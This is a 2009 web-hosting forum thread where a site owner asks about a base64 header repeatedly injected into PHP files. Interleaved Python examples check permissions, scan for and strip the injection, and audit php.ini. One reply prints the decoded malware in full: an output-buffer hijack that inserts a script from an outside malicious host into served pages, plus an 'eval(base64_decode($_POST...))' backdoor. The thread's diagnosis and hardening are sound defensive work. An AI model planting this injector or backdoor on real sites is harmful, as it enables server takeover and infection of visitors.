some weird script that look like a virus

 
spthai (Joined: 16 Oct 2009; Posts: 5)

Posted: Mon Oct 26, 2009 4:33 am    Post subject: some weird script that looks like a virus

Has anyone ever had a weird script line that looks like a virus? It looks something like this:

jf;akjf;lkjf;lkdsajflksjkhj9werln, ljf ....and so on at the header of the files.

I think this is a hacking attempt, and Google will filter your site as a dangerous site.

If you guys have ever experienced this, how do you prevent the hacker from intruding on your files again?

Thanks
_________________
Cosmetic Surgery Thailand
Plastic Surgery Thailand
Toasty (Joined: 21 Feb 2008; Posts: 298; Location: Chicago, IL)

Posted: Wed Oct 28, 2009 3:27 am

We're going to need more details. It's possible that it's an eval for a base64 statement. I'm guessing that's not an abstract of the actual code, hence why I need more of it to see.
_________________
Audit the secure configuration of your server headers!
spthai (Joined: 16 Oct 2009; Posts: 5)

Posted: Fri Nov 20, 2009 11:24 am

Quote:
<?php eval(base64_decode('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')); ?><?php
/* Short and sweet */


Here's the code... I still have a problem preventing the hacker from coming back and installing the code in my files. He keeps coming back and putting the code back when I delete it.
DonQuichote (Joined: 24 Dec 2006; Posts: 68; Location: The Netherlands)

Posted: Sun Nov 22, 2009 7:05 pm    Post subject: Access

Well, the hacker must get access somehow. It is up to you to investigate what possibilities the hacker has. Does the web server user have write access to the served directories? In that case, everything can be done through PHP. Simply deny the web server user that write access.

But it could also be that another service is hacked. If you have enabled root login for SSH, for example. What OS are you using?
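DonQuichote's question, turned into a check, as an added example that is not from the thread: walk the served directory tree and list every file or directory that the web server account could write through the classic POSIX mode bits. A writable directory matters as much as a writable file, because that is where a dropped script lands. The uid/gid pair 33/33 in the usage line is an assumption (the www-data account on Debian-based systems; substitute whatever account your web server actually runs as), and the check deliberately ignores ACLs and the root override.

```python
import os
import stat


def writable_by(mode, file_uid, file_gid, uid, gid):
    """True if a process running as uid/gid could write this inode under the
    classic POSIX rules: owner bits if it owns the file, otherwise group bits
    if it shares the group, otherwise the 'other' bits. ACLs and the root
    override are ignored on purpose (assumption: plain mode-bit setup)."""
    if file_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid == gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def find_writable(root, uid, gid):
    """Return the sorted paths under root (root itself included) that uid/gid
    could write. Symlinks are skipped; their targets are judged on their own
    if the walk reaches them."""
    hits = []
    st = os.lstat(root)
    if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gid):
        hits.append(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gid):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    import sys

    docroot = sys.argv[1] if len(sys.argv) > 1 else "."
    # Assumption: uid/gid 33 is the web server account (www-data on Debian).
    for path in find_writable(docroot, 33, 33):
        print("web server can write:", path)
```

Run it against the document root as root (or as any account that can stat every file). Anything it lists is a location the web server process, and therefore any PHP script it runs, can modify; the fix DonQuichote describes is to take that write bit away, leaving only the directories the application genuinely needs to write (uploads, caches) and keeping those outside the set of paths PHP will execute.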
Toasty (Joined: 21 Feb 2008; Posts: 298; Location: Chicago, IL)

Posted: Wed Nov 25, 2009 5:21 pm

I'm looking through what you posted now, I'll post my results soon.
Toasty (Joined: 21 Feb 2008; Posts: 298; Location: Chicago, IL)

Posted: Wed Nov 25, 2009 5:33 pm

Update:

I'm not 100% sure what this script does, but I highly suggest you start checking your system for holes (file inclusion holes especially).

Here's the code that script executes:

Code:
<?PHP
if(!isset($gy01))
   {
   function gy0($s)
      {
      if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v)if(count(explode("\n",$v))>5)
         {
         $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
         if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
         }
      if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
      $s=str_replace($a="<script src=http://annuarita.radom.pl/ksiega/count.php ></script>",'',$s);
      if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
      elseif(strpos($s,',a'))$s.=$a;return $s;}
      function gy02($a,$b,$c,$d)
      {
      global $gy01;$s=array();
      if(function_exists($gy01))call_user_func($gy01,$a,$b,$c,$d);
      foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='gy0')return;
      elseif($a=='ob_gzhandler')
      break;
      else
      $s[]=array($a=='default output handler'?false:$a);
      for($i=count($s)-1;$i>=0;$i--)
         {
         $s[$i][1]=ob_get_contents();ob_end_clean();
         }
      ob_start('gy0');
      for($i=0;$i<count($s);$i++)
         {
         ob_start($s[$i][0]);echo $s[$i][1];
         }
      }
   }
$gy0l=(($a=@set_error_handler('gy02'))!='gy02')?$a:0;
eval(base64_decode($_POST['e']));
?>



I DO NOT think this will run, because I'm sure (hope) that Aprelium has some character filters.

You'll notice the script URL in there, that was encoded again, even after the original encode, telling me that was "super secret!!!"

Well, I traced the link, and it is already known as a malicious site (see Google's Safe Browsing page (safe to click)).


One suggestion is to add a line to your header file, or do an auto_prepend in your php.ini, to include code like this:

Code:
<?PHP
// Remove the dropped file whenever any PHP page is served
if (file_exists("name_of_that_file.php"))
{
    unlink("name_of_that_file.php");
}
?>

That will delete it any time a PHP page is loaded -- including the script itself, should it be PHP.


Last edited by Toasty on Wed Nov 25, 2009 5:35 pm; edited 1 time in total
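As an added example that is not code from the thread or from Aprelium, here is a Python scanner for the injected header Toasty decoded: it finds a file that opens with `<?php eval(base64_decode('...'));`, decodes the payload and checks it for the indicators visible in his listing (`$_POST` for the remote-command line, `ob_start`/`set_error_handler` for the output-buffer hijack, `<iframe>`/`<script>` for the injected tags), then strips the header back out of the file. The sample web root it builds in a temporary directory is constructed for the demonstration; the file names and the short stand-in payload are assumptions, not the actual injected code.

```python
import base64
import os
import re
import tempfile

# The header seen in this thread: a PHP open tag followed straight away by
# eval(base64_decode('...')), optionally closing its own tag before the real file.
INJECTED_RE = re.compile(
    rb"<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*;(\s*\?>)?",
    re.IGNORECASE,
)

# Strings that, in the decoded script Toasty posted, mark the two halves of the
# implant: remote command execution and output-buffer rewriting.
PAYLOAD_INDICATORS = (b"$_POST", b"$_GET", b"$_REQUEST", b"ob_start",
                      b"set_error_handler", b"<iframe", b"<script")


def scan_file(path):
    """Return a finding dict for one file, or None if the header is absent."""
    with open(path, "rb") as fh:
        head = fh.read(65536)          # the injection sits at the top of the file
    m = INJECTED_RE.search(head)
    if not m:
        return None
    try:
        payload = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        payload = b""                  # malformed base64: still report the header
    return {
        "path": path,
        "offset": m.start(),
        "payload_len": len(payload),
        "indicators": [i.decode() for i in PAYLOAD_INDICATORS if i in payload],
    }


def scan_tree(root):
    """Walk root and collect findings for every PHP source file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                f = scan_file(os.path.join(dirpath, name))
                if f:
                    findings.append(f)
    return sorted(findings, key=lambda f: f["path"])


def _replacement(m):
    # If the injected block closed its own tag, the original file follows intact.
    # If it did not, the file's own code continues inside the same tag, so the
    # open tag has to survive.
    return b"" if m.group(2) else b"<?php\n"


def strip_injection(path):
    """Remove every injected header from the file in place; True if changed.
    Copy the tree somewhere safe before running this: it is a cleanup, not a
    forensic image."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned = INJECTED_RE.sub(_replacement, data)
    if cleaned == data:
        return False
    with open(path, "wb") as fh:
        fh.write(cleaned)
    return True


def build_demo_tree():
    """Constructed sample web root: one infected file, one clean file. The
    payload is a short stand-in written here, not the real injected code."""
    root = tempfile.mkdtemp(prefix="webroot_")
    payload = b"if(!isset($gy01)){}\neval(base64_decode($_POST['e']));"
    infected = (b"<?php eval(base64_decode('" + base64.b64encode(payload)
                + b"')); ?><?php\n/* Short and sweet */\necho 'hello';\n")
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(infected)
    with open(os.path.join(root, "inc", "config.php"), "wb") as fh:
        fh.write(b"<?php\n// nothing injected here\necho 'clean';\n")
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    for f in scan_tree(root):
        print(f"{f['path']}: payload {f['payload_len']} bytes, indicators {f['indicators']}")
        strip_injection(f["path"])
    print("after cleanup:", scan_tree(root))
```

Cleaning the files is only half of what the thread asks for: as long as the write path the hacker used is still open, the header comes back, which is exactly what spthai reports. Run the scan again after each fix to see whether the reinfection has stopped, and keep the first infected copies so you can compare payloads between visits.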
Toasty (Joined: 21 Feb 2008; Posts: 298; Location: Chicago, IL)

Posted: Wed Nov 25, 2009 5:34 pm

(Delete this post)

I accidentally clicked submit twice.
DonQuichote (Joined: 24 Dec 2006; Posts: 68; Location: The Netherlands)

Posted: Wed Nov 25, 2009 8:58 pm    Post subject: Get rid of this now.

The last line is the best:
Code:
eval(base64_decode($_POST['e']));

This will happily execute anything that the hacker wants on your server (unless you disabled the eval function). So I suggest you take it off-line and only bring it back up once you really know you are safe.
Toasty (Joined: 21 Feb 2008; Posts: 298; Location: Chicago, IL)

Posted: Wed Nov 25, 2009 9:08 pm

^Oops. I saw that line before too, but failed to mention it.

Nice catch.


spthai, if you're running any "prefab" software (for example: Joomla, phpBB, Drupal, Invision, etc) could you let us know? If you include the versions, I can do some more looking around and see if there's a file inclusion hole, or an upload hole that can be exploited.

If the software you're using is built by yourself, make sure all variables provided from the client (REFERRER, POST, GET, COOKIE, REQUEST, and so on) are filtered at the beginning of the script (with regular expressions preferably).

The next step after the filtering would be to set:

register_globals = off;

In your PHP.INI. Aprelium's pre-configured PHP packages ship with this option set to on, and while it is convenient, it's a serious security exploit -- and will be a removed feature once PHP 6 rolls out.
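As an added example that is not part of Toasty's post, a small Python audit that parses a php.ini and reports `register_globals` left On, together with `allow_url_include` (my addition: it is the directive that permits remote file inclusion, the class of "file inclusion hole" Toasty refers to, but the thread itself does not name it). The two ini fragments are constructed samples: the first models the convenience setting he describes in the pre-configured package, the second the corrected one.

```python
# Directives flagged when enabled. register_globals is the one Toasty names;
# allow_url_include is an assumption on my part (the switch behind remote
# include()/require() of URLs).
RISKY_WHEN_ON = {
    "register_globals": "request parameters become global variables",
    "allow_url_include": "include/require will fetch and run remote URLs",
}

# PHP's ini parser treats these words as boolean true; everything else,
# including Off/No/False/0/None and an empty value, is false.
TRUE_WORDS = {"on", "yes", "true", "1"}


def parse_php_ini(text):
    """Map directive name (lowercased) to its raw value. The last assignment
    wins, as in PHP. A line starting with ';' is a comment, '[section]' lines
    are skipped, an unquoted value ends at an inline ';' and a quoted value is
    taken whole."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("["):
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        value = value.strip()
        if value.startswith('"'):
            value = value[1:].split('"', 1)[0]      # quoted value, keep it whole
        else:
            value = value.split(";", 1)[0].strip()  # drop an inline comment
        settings[key.strip().lower()] = value
    return settings


def ini_bool(value):
    """PHP's truthiness rule for boolean ini values."""
    return value.strip().lower() in TRUE_WORDS


def audit_php_ini(text):
    """Return [(directive, reason)] for every risky directive that is On.
    A missing directive counts as Off, which is PHP's own default for both."""
    settings = parse_php_ini(text)
    return [(d, why) for d, why in RISKY_WHEN_ON.items()
            if ini_bool(settings.get(d, "off"))]


WEAK_INI = """; constructed sample: a convenience-oriented php.ini
[PHP]
register_globals = On
allow_url_fopen = On
allow_url_include = On   ; remote includes enabled
"""

HARDENED_INI = """; constructed sample: the corrected settings
[PHP]
register_globals = Off
allow_url_fopen = On
allow_url_include = Off
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_php_ini(text) or "no risky directives enabled")
```

Point it at the php.ini the web server actually loads (the one reported by `phpinfo()` or `php --ini`, not just the one in the package directory), since a stray copy elsewhere is a common reason a setting appears fixed but is still On at runtime.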